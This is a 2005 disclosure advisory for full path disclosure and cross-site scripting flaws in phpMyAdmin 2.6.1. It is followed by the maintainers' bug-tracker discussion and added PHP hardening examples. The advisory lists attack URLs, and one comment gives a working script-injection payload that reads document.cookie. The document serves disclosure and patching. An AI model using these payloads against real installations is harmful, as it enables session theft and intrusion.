-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5]
Author: cXIb8O3
Date: 22.2.2005
- --- 0. Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
- --- 1. Full Path Disclosure ---
1.0
http://[HOST]/[DIR]/libraries/sqlvalidator.lib.php?cfg[SQLValidator][use]=cXIb8O3
Error message :
- ---------------
Warning: main(./libraries/sqlvalidator.class.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39
Fatal error: main() [function.require]: Failed opening
required './libraries/sqlvalidator.class.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39
1.1
http://[HOST]/[DIR]/libraries/sqlparser.lib.php
Error message :
- ---------------
Warning: main(./libraries/string.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46
Fatal error: main() [function.require]: Failed opening
required './libraries/string.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46
- ---------------
1.2
http://[HOST]/[DIR]/libraries/select_theme.lib.php
Error message :
- ---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34
Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34
- ---------------
1.3
http://[HOST]/[DIR]/libraries/select_lang.lib.php
Error message :
- ---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14
Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14
- ---------------
1.4
http://[HOST]/[DIR]/libraries/relation_cleanup.lib.php
Error message :
- ---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10
Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10
- ---------------
1.5
http://[HOST]/[DIR]/libraries/header_meta_style.inc.php
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/header_meta_style.inc.php
on line 9
- ---------------
1.6
http://[HOST]/[DIR]/libraries/get_foreign.lib.php?foreigners=cXIb8O3&field=hi&foreigners[hi]=unloved
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_countRecords() in
/www/phpMyAdmin-2.6.1/libraries/get_foreign.lib.php on
line 28
- ---------------
1.7
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_linkOrButton() in
/www/phpMyAdmin-2.6.1/libraries/display_tbl_links.lib.php
on line 28
- ---------------
1.8
http://[HOST]/[DIR]/libraries/display_export.lib.php
Error message :
- ---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6
Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6
- ---------------
1.9
http://[HOST]/[DIR]/libraries/db_table_exists.lib.php
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_sendHeaderLocation() in
/www/phpMyAdmin-2.6.1/libraries/db_table_exists.lib.php
on line 16
- ---------------
1.10
http://[HOST]/[DIR]/libraries/charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=smutno&allow_recoding=mi
Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/charset_conversion.lib.php
on line 42
- ---------------
1.11
http://[HOST]/[DIR]/libraries/fpdf/ufpdf.php
Error message :
- ---------------
Warning: main(./libraries/fpdf/fpdf.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18
Warning: main() [function.include]: Failed opening
'./libraries/fpdf/fpdf.php' for inclusion
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18
Fatal error: Class 'FPDF' not found in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 20
- ---------------
1.12
http://[HOST]/[DIR]/libraries/dbi/mysqli.dbi.lib.php
Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbi/mysqli.dbi.lib.php
on line 13
- ---------------
1.13
http://[HOST]/[DIR]/libraries/dbg/setup.php?GLOBALS[cfg][DBG][enable]=cXIb
Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbg/setup.php on line 10
- ---------------
1.14
http://[HOST]/[DIR]/libraries/auth/cookie.auth.lib.php?coming_from_common=cXIb8O3
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/auth/cookie.auth.lib.php
on line 17
- ---------------
- --- 2. XSS aka Cross Site Scripting ---
2.0
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
2.1
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
2.2
http://[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.
2.3
http://[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.
- --- 3. How to fix ---
Download the new version of the script or update.
- --- 4. Greets ---
sp3x and ladyBMS
- --- 5. Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)
iD8DBQFCG5UVznmvyJCR4zQRAjWPAJ426XMVICiyHa8uWL0bkuTaXbeMNACdFRzq
BrQu2PRFI/Myhw5gg8rGW9s=
=miO8
-----END PGP SIGNATURE-----
I am waiting for patches...
user_id=418833
Maksymilian,
thank you for your report.
First of all, please do not submit two different issues with
one bug report.
The first issue (path disclosure) was already reported to us
and we are currently dealing with it. Please note, that you
can only exploit it if the php setting "display_errors" is
set to 1. The php manual advises to disable this feature on
production systems.
http://de2.php.net/manual/en/ref.errorfunc.php#ini.display-errors
Thank you,
Alexander M. Turek
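The two server-side measures behind this reply, as an added example that is not phpMyAdmin's own code: PHP errors are logged instead of displayed, and a library file refuses to execute when it is requested directly rather than included by an entry script. The constant PMA_ENTRY_POINT, the log path and the dependency file name are assumptions made for the illustration.

```php
<?php
// Added example, not phpMyAdmin's code. Illustrates the two settings that
// stop the full path disclosure reported in section 1: PHP errors are
// logged instead of displayed, and a library file refuses to run when it
// is requested directly instead of being included by an entry script.
// PMA_ENTRY_POINT, the log path and the dependency name are assumptions.

// Error output: keep the report, but only in the server log. With
// display_errors off, a failed require prints nothing to the client.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/php/app-errors.log'); // assumed path
error_reporting(E_ALL);

// A library file is not an entry point. The real entry script (index.php
// or similar) defines PMA_ENTRY_POINT before requiring libraries; a direct
// request like /libraries/sqlparser.lib.php sees it undefined and gets a
// bare 403 that carries no filesystem path.
if (!defined('PMA_ENTRY_POINT')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Forbidden');
}

// Resolve dependencies relative to this file rather than to the current
// working directory ('./libraries/...' only resolves from the top
// directory, which is why the direct requests above fail), and answer a
// missing dependency with a generic message.
$dependency = dirname(__FILE__) . '/string.lib.php';
if (!is_readable($dependency)) {
    error_log('missing dependency: ' . $dependency); // path stays server-side
    header('HTTP/1.0 500 Internal Server Error');
    exit('Internal error');
}
require_once $dependency;
```

The same two ini settings can be applied without touching code through php.ini or a per-directory .htaccess (php_flag display_errors off, php_flag log_errors on); the entry-point guard is what removes the direct-request path entirely.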
user_id=1225357
Ok.. so path disclosure is non-critical etc..
but XSS..
user_id=418833
OK, let's do this. :-)
2.0: With grab_globals.lib.php, rev. 2.8 (attached to bug
#1149381), I cannot reproduce these exploits anymore.
2.1, 2.2 and 2.3: These exploits require "register_globals"
to be enabled in php.ini. This setting is considered to be
very dangerous and therefore disabled by default since php 4.2.0.
http://de3.php.net/register_globals
Maksymilian, is there any XSS attack you can see with my
latest patch and register_globals = Off? If not, I'd like to
mark this bug as fixed, too.
user_id=192186
Ad 2.1: I suggest making the content of that file a function and
calling it with all needed params instead of including it.
Ad 2.2 and 2.3: I can't find anything dangerous in modifying
CSS.
user_id=418833
Michal, when the script is called directly, the headers that
declare the code to be CSS are not sent. The browser would
expect HTML code, so you could inject harmful JS code here.
Were you able to reproduce the exploits?
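A stylesheet script hardened along the lines of this reply, as an added example that is not phpMyAdmin's theme code: the Content-Type header is sent before any output, so a browser never parses the response as HTML, and the request parameters named in 2.2 are whitelisted or cast before they reach the output. The font list and the width rule are assumptions.

```php
<?php
// Added example, not phpMyAdmin's theme code: a stylesheet script in the
// style of themes/original/css/theme_left.css.php, hardened against the
// injection reported under 2.2/2.3. Parameter names follow the report;
// the font list and the width rule are assumptions.

// Declare the content type before any output. Served as text/css, injected
// markup such as <script> is never parsed as HTML by the browser, which is
// the failure mode when the script is called directly without this header.
header('Content-Type: text/css; charset=utf-8');

// Read input from $_GET explicitly rather than relying on a global that
// register_globals may or may not have populated, and accept only values
// from a fixed list so no user-controlled bytes reach the output.
$allowed_fonts = array('sans-serif', 'serif', 'monospace', 'Verdana', 'Arial');
$font = isset($_GET['left_font_family']) ? $_GET['left_font_family'] : 'sans-serif';
if (!in_array($font, $allowed_fonts, true)) {
    $font = 'sans-serif'; // unknown value: fall back, never echo it
}

// Numeric parameters are cast, so anything appended to a digit is dropped.
$num_dbs = isset($_GET['num_dbs']) ? (int) $_GET['num_dbs'] : 0;
$left_width = ($num_dbs > 50) ? '250px' : '200px';

// Every interpolated value is now either whitelisted or derived from an
// integer, so this output cannot carry a script regardless of the request.
echo "body { font-family: $font; }\n";
echo "div#left { width: $left_width; }\n";
```

The header alone already neutralises the direct-request case described above; the whitelist is what keeps the script safe even when a parameter is later reused in an HTML context.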
user_id=192186
Maksymilian: When you sign messages using pgp, you should
publish public key on keyserver, otherwise it doesn't make
much sense.
rabus: I can reproduce it only with register_globals on. But
it's really hard to make valid javascript there when
magic_quotes_gpc is enabled (which is the default).
user_id=210714
Alexander,
for 2.0, I am able to reproduce, with PMA 2.6.1, using
/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
It happens also with current cvs HEAD (grab_globals.lib.php 2.8)
user_id=192186
Marc: you have register_globals on ;-)
user_id=418833
Michal is right. With register_globals set to off, this
should not be possible anymore:
http://rabus.phpmyadmin.net/demos/CVS_LATEST/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
If register_globals is on, it is almost impossible to avoid
such problems.
user_id=210714
Yes I have register_globals set to On; you see, here many
scripts are running, which depend on this setting .... And
I'm probably not the only one.
We have PMA_sanitize() which can take care of this. However,
I should put it into another include and call it from the
top of each script: much work in perspective.
user_id=418833
Marc,
this is mainly why it is possible to trigger this setting on
a per-directory basis. Enabling register_globals in php.ini
is dangerous and getting phpMyAdmin to detect harmful
variable injections is not that trivial right now.
user_id=1225357
Ok so..
If register_globals=Off, the CSS issues don't exist, but if
register_globals=On, I can make an XSS attack.
For example:
If I have a www on server X where register_globals=On and
phpMyAdmin in my www, there is nothing I can do about it. Better to remove
this XSS from phpMyAdmin. ;]
user_id=418833
Sure you can, at least if you are using the Apache Webserver:
echo "php_flag register_globals off" >>
/path/to/phpMyAdmin/.htaccess
If not, there is probably a way to change php settings on a
per-directory basis in other webservers too.
Working around register_globals injections is almost
impossible for a project of our size. We will try to fix
this as far as possible with upcoming releases, but we can
never guarantee that you are fully protected against such
exploits. Securing php against them is mainly your task, not
ours. Sorry. :-/
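For installations where the per-directory php_flag shown above cannot be applied, the application can defend itself at startup. The following bootstrap is an added example and not phpMyAdmin's PMA_sanitize(): when register_globals is found enabled it removes every global that arrived through the request, so a query such as ?cfg[Servers][x]=y cannot pre-populate $cfg before the real configuration file is loaded. The config file location is an assumption.

```php
<?php
// Added example, not phpMyAdmin's PMA_sanitize(): a bootstrap file meant to
// be required first by every script, which undoes register_globals when the
// administrator has left it on. It complements the per-directory
// "php_flag register_globals off" fix rather than replacing it.
// The config file location is an assumption.

function undo_register_globals()
{
    // The superglobals must survive; everything else that arrived through
    // the request, cookies, files, environment or server variables is
    // removed from the global scope. Locals here are not globals, so the
    // loop cannot unset its own working variables.
    $keep = array('GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                  '_SERVER', '_ENV', '_FILES', '_SESSION');
    $sources = array($_GET, $_POST, $_COOKIE, $_FILES, $_ENV, $_SERVER);
    foreach ($sources as $source) {
        foreach (array_keys($source) as $name) {
            if (!in_array($name, $keep, true)) {
                unset($GLOBALS[$name]);
            }
        }
    }
}

// ini_get() returns "1" when the flag is on and "" or "0" when it is off.
if (ini_get('register_globals')) {
    undo_register_globals();
}

// Only now is the configuration defined, so the values seen by the rest of
// the application come from the config file alone, never from the request.
$cfg = array();
require_once dirname(__FILE__) . '/config.inc.php'; // assumed location
```

Because the cleanup runs before any configuration is read, the order matters: a script that builds $cfg first and sanitises later would still have handed the injected array to whatever ran in between.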
user_id=1225357
Ok... [: